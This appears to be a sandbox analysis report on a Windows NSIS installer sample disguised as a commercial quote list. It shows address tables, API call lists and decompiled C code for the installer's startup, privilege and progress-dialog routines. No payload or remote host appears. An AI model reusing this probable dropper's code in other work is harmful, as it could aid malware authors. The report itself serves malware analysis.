                                                                                                                                                                                  0x004035a8
                                                                                                                                                                                  0x0040359c
                                                                                                                                                                                  0x00403426
                                                                                                                                                                                  0x0040342d
                                                                                                                                                                                  0x0040342d
                                                                                                                                                                                  0x0040337f
                                                                                                                                                                                  0x004033f7
                                                                                                                                                                                  0x004033f7
                                                                                                                                                                                  0x00403403
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00403403
                                                                                                                                                                                  0x00403388
                                                                                                                                                                                  0x0040338c
                                                                                                                                                                                  0x004033c2
                                                                                                                                                                                  0x004033c2
                                                                                                                                                                                  0x004033c4
                                                                                                                                                                                  0x004033cc
                                                                                                                                                                                  0x0040343e
                                                                                                                                                                                  0x00403440
                                                                                                                                                                                  0x00403447
                                                                                                                                                                                  0x0040344f
                                                                                                                                                                                  0x0040344f
                                                                                                                                                                                  0x0040345a
                                                                                                                                                                                  0x0040345f
                                                                                                                                                                                  0x0040346e
                                                                                                                                                                                  0x00403472
                                                                                                                                                                                  0x00403473
                                                                                                                                                                                  0x0040347c
                                                                                                                                                                                  0x00403475
                                                                                                                                                                                  0x00403475
                                                                                                                                                                                  0x00403475
                                                                                                                                                                                  0x00403482
                                                                                                                                                                                  0x00403488
                                                                                                                                                                                  0x0040348e
                                                                                                                                                                                  0x00403496
                                                                                                                                                                                  0x00403496
                                                                                                                                                                                  0x004034a4
                                                                                                                                                                                  0x004034a9
                                                                                                                                                                                  0x004034bb
                                                                                                                                                                                  0x004034c9
                                                                                                                                                                                  0x004034d5
                                                                                                                                                                                  0x004034db
                                                                                                                                                                                  0x004034e5
                                                                                                                                                                                  0x004034fb
                                                                                                                                                                                  0x0040350c
                                                                                                                                                                                  0x00403512
                                                                                                                                                                                  0x00403519
                                                                                                                                                                                  0x0040351c
                                                                                                                                                                                  0x00403522
                                                                                                                                                                                  0x00403522
                                                                                                                                                                                  0x00403519
                                                                                                                                                                                  0x00403526
                                                                                                                                                                                  0x0040352c
                                                                                                                                                                                  0x0040352c
                                                                                                                                                                                  0x00403531
                                                                                                                                                                                  0x00403531
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x0040346e
                                                                                                                                                                                  0x004033ce
                                                                                                                                                                                  0x004033d0
                                                                                                                                                                                  0x004033db
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x004033e3
                                                                                                                                                                                  0x004033ee
                                                                                                                                                                                  0x004033f3
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x004033f3
                                                                                                                                                                                  0x004033b7
                                                                                                                                                                                  0x004033b9
                                                                                                                                                                                  0x004033bd
                                                                                                                                                                                  0x004033c0
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x004033c0
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x004033b9
                                                                                                                                                                                  0x00403309
                                                                                                                                                                                  0x00403315
                                                                                                                                                                                  0x0040331a
                                                                                                                                                                                  0x0040331f
                                                                                                                                                                                  0x00403321
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00403329
                                                                                                                                                                                  0x00403331
                                                                                                                                                                                  0x00403342
                                                                                                                                                                                  0x0040334a
                                                                                                                                                                                  0x0040334c
                                                                                                                                                                                  0x00403351
                                                                                                                                                                                  0x00403353
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00403353
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x004032b8
                                                                                                                                                                                  0x00403279
                                                                                                                                                                                  0x0040327c
                                                                                                                                                                                  0x0040327f
                                                                                                                                                                                  0x00403285
                                                                                                                                                                                  0x00403285
                                                                                                                                                                                  0x00403285
                                                                                                                                                                                  0x00403285
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00403285
                                                                                                                                                                                  0x00403281
                                                                                                                                                                                  0x00403283
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00403283
                                                                                                                                                                                  0x00403234
                                                                                                                                                                                  0x00403237
                                                                                                                                                                                  0x0040323a
                                                                                                                                                                                  0x00403240
                                                                                                                                                                                  0x00403240
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00403240
                                                                                                                                                                                  0x0040323c
                                                                                                                                                                                  0x0040323e
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x0040323e
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x0040320f
                                                                                                                                                                                  0x0040320f
                                                                                                                                                                                  0x0040320f
                                                                                                                                                                                  0x00403210
                                                                                                                                                                                  0x00403210
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x0040320f
                                                                                                                                                                                  0x00000000

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • SetErrorMode.KERNELBASE ref: 00403134
                                                                                                                                                                                  • GetVersion.KERNEL32 ref: 0040313A
                                                                                                                                                                                  • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403163
                                                                                                                                                                                  • #17.COMCTL32(00000007,00000009), ref: 00403185
                                                                                                                                                                                  • OleInitialize.OLE32(00000000), ref: 0040318C
                                                                                                                                                                                  • SHGetFileInfoA.SHELL32(00428828,00000000,?,00000160,00000000), ref: 004031A8
                                                                                                                                                                                  • GetCommandLineA.KERNEL32(Baptistisk Setup,NSIS Error), ref: 004031BD
                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\RFQINL0607_Commerical_list.exe",00000000), ref: 004031D0
                                                                                                                                                                                  • CharNextA.USER32(00000000,"C:\Users\user\Desktop\RFQINL0607_Commerical_list.exe",00000020), ref: 004031FB
                                                                                                                                                                                  • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 004032F8
                                                                                                                                                                                  • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 00403309
                                                                                                                                                                                  • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403315
                                                                                                                                                                                  • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403329
                                                                                                                                                                                  • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403331
                                                                                                                                                                                  • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403342
                                                                                                                                                                                  • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040334A
                                                                                                                                                                                  • DeleteFileA.KERNELBASE(1033), ref: 0040335E
                                                                                                                                                                                    • Part of subcall function 004060C8: GetModuleHandleA.KERNEL32(?,?,?,00403179,00000009), ref: 004060DA
                                                                                                                                                                                    • Part of subcall function 004060C8: GetProcAddress.KERNEL32(00000000,?), ref: 004060F5
                                                                                                                                                                                  • OleUninitialize.OLE32(?), ref: 0040340C
                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 0040342D
                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(00000028,?), ref: 0040354A
                                                                                                                                                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 00403551
                                                                                                                                                                                  • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403569
                                                                                                                                                                                  • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 00403588
                                                                                                                                                                                  • ExitWindowsEx.USER32(00000002,80040002), ref: 004035AC
                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 004035CF
                                                                                                                                                                                    • Part of subcall function 00405525: MessageBoxIndirectA.USER32(00409218), ref: 00405580
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.11499590101.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.11499558014.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499653111.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000486000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Process$Exit$EnvironmentFileHandleModulePathTempTokenVariableWindowslstrcat$AddressAdjustCharCommandCurrentDeleteDirectoryErrorIndirectInfoInitializeLineLookupMessageModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrlen
                                                                                                                                                                                  • String ID: "$"C:\Users\user\Desktop\RFQINL0607_Commerical_list.exe"$.tmp$1033$7580360$Baptistisk Setup$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\sjoske\Humlebier\aesc$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\sjoske\Humlebier\aesc\Antioxidanttilskud\Pellicularia\Unillusioned$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\RFQINL0607_Commerical_list.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$`K-v$~nsu
                                                                                                                                                                                  • API String ID: 3329125770-3218857363
                                                                                                                                                                                  • Opcode ID: dcb38b1e2b76dc19c0501d8e0158ad62898b17a6a9361bfb335ac8dc35fe19f6
                                                                                                                                                                                  • Instruction ID: 749ed98c63e487a66f460374afa67f5348490bcf6ac540fe4d7c6930d14d49f5
                                                                                                                                                                                  • Opcode Fuzzy Hash: dcb38b1e2b76dc19c0501d8e0158ad62898b17a6a9361bfb335ac8dc35fe19f6
                                                                                                                                                                                  • Instruction Fuzzy Hash: E1C105306086416AE7216F61AC4DA6F3EACEF46706F04457FF541BA1E3C77C9A058B2E
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 00405086 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 282windowclipboardmemoryCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 128 405086-4050a2 129 405231-405237 128->129 130 4050a8-40516f GetDlgItem * 3 call 403f49 call 4047e6 GetClientRect GetSystemMetrics SendMessageA * 2 128->130 132 405261-40526d 129->132 133 405239-40525b GetDlgItem CreateThread CloseHandle 129->133 150 405171-40518b SendMessageA * 2 130->150 151 40518d-405190 130->151 135 40528f-405295 132->135 136 40526f-405275 132->136 133->132 140 405297-40529d 135->140 141 4052ea-4052ed 135->141 138 4052b0-4052b7 call 403f7b 136->138 139 405277-40528a ShowWindow * 2 call 403f49 136->139 154 4052bc-4052c0 138->154 139->135 145 4052c3-4052d3 ShowWindow 140->145 146 40529f-4052ab call 403eed 140->146 141->138 143 4052ef-4052f5 141->143 143->138 152 4052f7-40530a SendMessageA 143->152 148 4052e3-4052e5 call 403eed 145->148 149 4052d5-4052de call 404f48 145->149 146->138 148->141 149->148 150->151 157 4051a0-4051b7 call 403f14 151->157 158 405192-40519e SendMessageA 151->158 159 405310-40533c CreatePopupMenu call 405d51 AppendMenuA 152->159 160 405407-405409 152->160 167 4051b9-4051cd ShowWindow 157->167 168 4051ed-40520e GetDlgItem SendMessageA 157->168 158->157 165 405351-405367 TrackPopupMenu 159->165 166 40533e-40534e GetWindowRect 159->166 160->154 165->160 170 40536d-405387 165->170 166->165 171 4051dc 167->171 172 4051cf-4051da ShowWindow 167->172 168->160 169 405214-40522c SendMessageA * 2 168->169 169->160 173 40538c-4053a7 SendMessageA 170->173 174 4051e2-4051e8 call 403f49 171->174 172->174 173->173 176 4053a9-4053c9 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 173->176 174->168 177 4053cb-4053eb SendMessageA 176->177 177->177 178 4053ed-405401 GlobalUnlock SetClipboardData CloseClipboard 177->178 178->160
                                                                                                                                                                                  C-Code - Quality: 96%
                                                                                                                                                                                  			E00405086(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				struct tagRECT _v24;
				void* _v32;
				signed int _v36;
				int _v40;
				int _v44;
				signed int _v48;
				int _v52;
				void* _v56;
				void* _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t87;
				struct HWND__* _t89;
				long _t90;
				int _t95;
				int _t96;
				long _t99;
				void* _t102;
				intOrPtr _t113;
				void* _t121;
				intOrPtr _t124;
				struct HWND__* _t128;
				int _t150;
				int _t153;
				long _t157;
				struct HWND__* _t161;
				struct HMENU__* _t163;
				long _t165;
				void* _t166;
				char* _t167;
				char* _t168;
				int _t169;

				_t87 =  *0x42dbe4; // 0x103ce
				_t157 = _a8;
				_t150 = 0;
				_v8 = _t87;
				if(_t157 != 0x110) {
					__eflags = _t157 - 0x405;
					if(_t157 == 0x405) {
						_t121 = CreateThread(0, 0, E0040501A, GetDlgItem(_a4, 0x3ec), 0,  &_a8); // executed
						CloseHandle(_t121);
					}
					__eflags = _t157 - 0x111;
					if(_t157 != 0x111) {
						L17:
						__eflags = _t157 - 0x404;
						if(_t157 != 0x404) {
							L25:
							__eflags = _t157 - 0x7b;
							if(_t157 != 0x7b) {
								goto L20;
							}
							_t89 = _v8;
							__eflags = _a12 - _t89;
							if(_a12 != _t89) {
								goto L20;
							}
							_t90 = SendMessageA(_t89, 0x1004, _t150, _t150);
							__eflags = _t90 - _t150;
							_a12 = _t90;
							if(_t90 <= _t150) {
								L36:
								return 0;
							}
							_t163 = CreatePopupMenu();
							AppendMenuA(_t163, _t150, "true", E00405D51(_t150, _t157, _t163, _t150, 0xffffffe1));
							_t95 = _a16;
							__eflags = _a16 - 0xffffffff;
							_t153 = _a16 >> 0x10;
							if(_a16 == 0xffffffff) {
								GetWindowRect(_v8,  &_v24);
								_t95 = _v24.left;
								_t153 = _v24.top;
							}
							_t96 = TrackPopupMenu(_t163, 0x180, _t95, _t153, _t150, _a4, _t150);
							__eflags = _t96 - 1;
							if(_t96 == 1) {
								_t165 = 1;
								__eflags = 1;
								_v56 = _t150;
								_v44 = 0x429868;
								_v40 = 0xfff;
								_a4 = _a12;
								do {
									_a4 = _a4 - 1;
									_t99 = SendMessageA(_v8, 0x102d, _a4,  &_v64);
									__eflags = _a4 - _t150;
									_t165 = _t165 + _t99 + 2;
								} while (_a4 != _t150);
								OpenClipboard(_t150);
								EmptyClipboard();
								_t102 = GlobalAlloc(0x42, _t165);
								_a4 = _t102;
								_t166 = GlobalLock(_t102);
								do {
									_v44 = _t166;
									_t167 = _t166 + SendMessageA(_v8, 0x102d, _t150,  &_v64);
									 *_t167 = 0xd;
									_t168 = _t167 + 1;
									 *_t168 = 0xa;
									_t166 = _t168 + 1;
									_t150 = _t150 + 1;
									__eflags = _t150 - _a12;
								} while (_t150 < _a12);
								GlobalUnlock(_a4);
								SetClipboardData("true", _a4);
								CloseClipboard();
							}
							goto L36;
						}
						__eflags =  *0x42dbcc - _t150; // 0x0
						if(__eflags == 0) {
							ShowWindow( *0x42e408, 8);
							__eflags =  *0x42e48c - _t150;
							if( *0x42e48c == _t150) {
								_t113 =  *0x429040; // 0x73b524
								E00404F48( *((intOrPtr*)(_t113 + 0x34)), _t150);
							}
							E00403EED("true");
							goto L25;
						}
						 *0x428c38 = 2;
						E00403EED(0x78);
						goto L20;
					} else {
						__eflags = _a12 - 0x403;
						if(_a12 != 0x403) {
							L20:
							return E00403F7B(_t157, _a12, _a16);
						}
						ShowWindow( *0x42dbd0, _t150);
						ShowWindow(_v8, 8);
						E00403F49(_v8);
						goto L17;
					}
				}
				_v48 = _v48 | 0xffffffff;
				_v36 = _v36 | 0xffffffff;
				_t169 = 2;
				_v56 = _t169;
				_v52 = 0;
				_v44 = 0;
				_v40 = 0;
				asm("stosd");
				asm("stosd");
				_t124 =  *0x42e410;
				_a12 =  *((intOrPtr*)(_t124 + 0x5c));
				_a8 =  *((intOrPtr*)(_t124 + 0x60));
				 *0x42dbd0 = GetDlgItem(_a4, 0x403);
				 *0x42dbc8 = GetDlgItem(_a4, 0x3ee);
				_t128 = GetDlgItem(_a4, 0x3f8);
				 *0x42dbe4 = _t128;
				_v8 = _t128;
				E00403F49( *0x42dbd0);
				 *0x42dbd4 = E004047E6(4);
				 *0x42dbec = 0;
				GetClientRect(_v8,  &_v24);
				_v48 = _v24.right - GetSystemMetrics(_t169);
				SendMessageA(_v8, 0x101b, 0,  &_v56); // executed
				SendMessageA(_v8, 0x1036, 0x4000, 0x4000); // executed
				if(_a12 >= 0) {
					SendMessageA(_v8, 0x1001, 0, _a12);
					SendMessageA(_v8, 0x1026, 0, _a12);
				}
				if(_a8 >= _t150) {
					SendMessageA(_v8, 0x1024, _t150, _a8);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E00403F14(_a4);
				if(( *0x42e418 & 0x00000003) != 0) {
					ShowWindow( *0x42dbd0, _t150);
					if(( *0x42e418 & 0x00000002) != 0) {
						 *0x42dbd0 = _t150;
					} else {
						ShowWindow(_v8, 8);
					}
					E00403F49( *0x42dbc8);
				}
				_t161 = GetDlgItem(_a4, 0x3ec);
				SendMessageA(_t161, 0x401, _t150, 0x75300000);
				if(( *0x42e418 & 0x00000004) != 0) {
					SendMessageA(_t161, 0x409, _t150, _a8);
					SendMessageA(_t161, 0x2001, _t150, _a12);
				}
				goto L36;
			}





































                                                                                                                                                                                  0x0040508c
                                                                                                                                                                                  0x00405094
                                                                                                                                                                                  0x00405097
                                                                                                                                                                                  0x0040509f
                                                                                                                                                                                  0x004050a2
                                                                                                                                                                                  0x00405231
                                                                                                                                                                                  0x00405237
                                                                                                                                                                                  0x00405254
                                                                                                                                                                                  0x0040525b
                                                                                                                                                                                  0x0040525b
                                                                                                                                                                                  0x00405267
                                                                                                                                                                                  0x0040526d
                                                                                                                                                                                  0x0040528f
                                                                                                                                                                                  0x0040528f
                                                                                                                                                                                  0x00405295
                                                                                                                                                                                  0x004052ea
                                                                                                                                                                                  0x004052ea
                                                                                                                                                                                  0x004052ed
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x004052ef
                                                                                                                                                                                  0x004052f2
                                                                                                                                                                                  0x004052f5
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x004052ff
                                                                                                                                                                                  0x00405305
                                                                                                                                                                                  0x00405307
                                                                                                                                                                                  0x0040530a
                                                                                                                                                                                  0x00405407
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00405407
                                                                                                                                                                                  0x00405319
                                                                                                                                                                                  0x00405325
                                                                                                                                                                                  0x0040532e
                                                                                                                                                                                  0x00405335
                                                                                                                                                                                  0x00405339
                                                                                                                                                                                  0x0040533c
                                                                                                                                                                                  0x00405345
                                                                                                                                                                                  0x0040534b
                                                                                                                                                                                  0x0040534e
                                                                                                                                                                                  0x0040534e
                                                                                                                                                                                  0x0040535e
                                                                                                                                                                                  0x00405364
                                                                                                                                                                                  0x00405367
                                                                                                                                                                                  0x00405372
                                                                                                                                                                                  0x00405372
                                                                                                                                                                                  0x00405373
                                                                                                                                                                                  0x00405376
                                                                                                                                                                                  0x0040537d
                                                                                                                                                                                  0x00405384
                                                                                                                                                                                  0x0040538c
                                                                                                                                                                                  0x0040538c
                                                                                                                                                                                  0x0040539a
                                                                                                                                                                                  0x004053a0
                                                                                                                                                                                  0x004053a3
                                                                                                                                                                                  0x004053a3
                                                                                                                                                                                  0x004053aa
                                                                                                                                                                                  0x004053b0
                                                                                                                                                                                  0x004053b9
                                                                                                                                                                                  0x004053c0
                                                                                                                                                                                  0x004053c9
                                                                                                                                                                                  0x004053cb
                                                                                                                                                                                  0x004053ce
                                                                                                                                                                                  0x004053dd
                                                                                                                                                                                  0x004053df
                                                                                                                                                                                  0x004053e2
                                                                                                                                                                                  0x004053e3
                                                                                                                                                                                  0x004053e6
                                                                                                                                                                                  0x004053e7
                                                                                                                                                                                  0x004053e8
                                                                                                                                                                                  0x004053e8
                                                                                                                                                                                  0x004053f0
                                                                                                                                                                                  0x004053fb
                                                                                                                                                                                  0x00405401
                                                                                                                                                                                  0x00405401
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00405367
                                                                                                                                                                                  0x00405297
                                                                                                                                                                                  0x0040529d
                                                                                                                                                                                  0x004052cb
                                                                                                                                                                                  0x004052cd
                                                                                                                                                                                  0x004052d3
                                                                                                                                                                                  0x004052d5
                                                                                                                                                                                  0x004052de
                                                                                                                                                                                  0x004052de
                                                                                                                                                                                  0x004052e5
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x004052e5
                                                                                                                                                                                  0x004052a1
                                                                                                                                                                                  0x004052ab
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x0040526f
                                                                                                                                                                                  0x0040526f
                                                                                                                                                                                  0x00405275
                                                                                                                                                                                  0x004052b0
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x004052b7
                                                                                                                                                                                  0x0040527e
                                                                                                                                                                                  0x00405285
                                                                                                                                                                                  0x0040528a
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x0040528a
                                                                                                                                                                                  0x0040526d
                                                                                                                                                                                  0x004050a8
                                                                                                                                                                                  0x004050ac
                                                                                                                                                                                  0x004050b4
                                                                                                                                                                                  0x004050b8
                                                                                                                                                                                  0x004050bb
                                                                                                                                                                                  0x004050be
                                                                                                                                                                                  0x004050c1
                                                                                                                                                                                  0x004050c4
                                                                                                                                                                                  0x004050c5
                                                                                                                                                                                  0x004050c6
                                                                                                                                                                                  0x004050df
                                                                                                                                                                                  0x004050e2
                                                                                                                                                                                  0x004050ec
                                                                                                                                                                                  0x004050fb
                                                                                                                                                                                  0x00405103
                                                                                                                                                                                  0x0040510b
                                                                                                                                                                                  0x00405110
                                                                                                                                                                                  0x00405113
                                                                                                                                                                                  0x0040511f
                                                                                                                                                                                  0x00405128
                                                                                                                                                                                  0x00405131
                                                                                                                                                                                  0x00405153
                                                                                                                                                                                  0x00405159
                                                                                                                                                                                  0x0040516a
                                                                                                                                                                                  0x0040516f
                                                                                                                                                                                  0x0040517d
                                                                                                                                                                                  0x0040518b
                                                                                                                                                                                  0x0040518b
                                                                                                                                                                                  0x00405190
                                                                                                                                                                                  0x0040519e
                                                                                                                                                                                  0x0040519e
                                                                                                                                                                                  0x004051a3
                                                                                                                                                                                  0x004051a6
                                                                                                                                                                                  0x004051ab
                                                                                                                                                                                  0x004051b7
                                                                                                                                                                                  0x004051c0
                                                                                                                                                                                  0x004051cd
                                                                                                                                                                                  0x004051dc
                                                                                                                                                                                  0x004051cf
                                                                                                                                                                                  0x004051d4
                                                                                                                                                                                  0x004051d4
                                                                                                                                                                                  0x004051e8
                                                                                                                                                                                  0x004051e8
                                                                                                                                                                                  0x004051fc
                                                                                                                                                                                  0x00405205
                                                                                                                                                                                  0x0040520e
                                                                                                                                                                                  0x0040521e
                                                                                                                                                                                  0x0040522a
                                                                                                                                                                                  0x0040522a
                                                                                                                                                                                  0x00000000

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetDlgItem.USER32(?,00000403), ref: 004050E5
                                                                                                                                                                                  • GetDlgItem.USER32(?,000003EE), ref: 004050F4
                                                                                                                                                                                  • GetClientRect.USER32(?,?), ref: 00405131
                                                                                                                                                                                  • GetSystemMetrics.USER32(00000002), ref: 00405138
                                                                                                                                                                                  • SendMessageA.USER32(?,0000101B,00000000,?), ref: 00405159
                                                                                                                                                                                  • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 0040516A
                                                                                                                                                                                  • SendMessageA.USER32(?,00001001,00000000,?), ref: 0040517D
                                                                                                                                                                                  • SendMessageA.USER32(?,00001026,00000000,?), ref: 0040518B
                                                                                                                                                                                  • SendMessageA.USER32(?,00001024,00000000,?), ref: 0040519E
                                                                                                                                                                                  • ShowWindow.USER32(00000000,?,0000001B,?), ref: 004051C0
                                                                                                                                                                                  • ShowWindow.USER32(?,00000008), ref: 004051D4
                                                                                                                                                                                  • GetDlgItem.USER32(?,000003EC), ref: 004051F5
                                                                                                                                                                                  • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405205
                                                                                                                                                                                  • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 0040521E
                                                                                                                                                                                  • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 0040522A
                                                                                                                                                                                  • GetDlgItem.USER32(?,000003F8), ref: 00405103
                                                                                                                                                                                    • Part of subcall function 00403F49: SendMessageA.USER32(00000028,?,?,00403D7A), ref: 00403F57
                                                                                                                                                                                  • GetDlgItem.USER32(?,000003EC), ref: 00405246
                                                                                                                                                                                  • CreateThread.KERNEL32(00000000,00000000,Function_0000501A,00000000), ref: 00405254
                                                                                                                                                                                  • CloseHandle.KERNELBASE(00000000), ref: 0040525B
                                                                                                                                                                                  • ShowWindow.USER32(00000000), ref: 0040527E
                                                                                                                                                                                  • ShowWindow.USER32(?,00000008), ref: 00405285
                                                                                                                                                                                  • ShowWindow.USER32(00000008), ref: 004052CB
                                                                                                                                                                                  • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052FF
                                                                                                                                                                                  • CreatePopupMenu.USER32 ref: 00405310
                                                                                                                                                                                  • AppendMenuA.USER32(00000000,00000000,?,00000000), ref: 00405325
                                                                                                                                                                                  • GetWindowRect.USER32(?,000000FF), ref: 00405345
                                                                                                                                                                                  • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040535E
                                                                                                                                                                                  • SendMessageA.USER32(?,0000102D,00000000,?), ref: 0040539A
                                                                                                                                                                                  • OpenClipboard.USER32(00000000), ref: 004053AA
                                                                                                                                                                                  • EmptyClipboard.USER32 ref: 004053B0
                                                                                                                                                                                  • GlobalAlloc.KERNEL32(00000042,?), ref: 004053B9
                                                                                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 004053C3
                                                                                                                                                                                  • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004053D7
                                                                                                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 004053F0
                                                                                                                                                                                  • SetClipboardData.USER32(?,00000000), ref: 004053FB
                                                                                                                                                                                  • CloseClipboard.USER32 ref: 00405401
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • Baptistisk Setup: Installing, xrefs: 00405376
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.11499590101.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.11499558014.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499653111.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000486000.00000002.00000001.01000000.00000003.sdmpDownload File
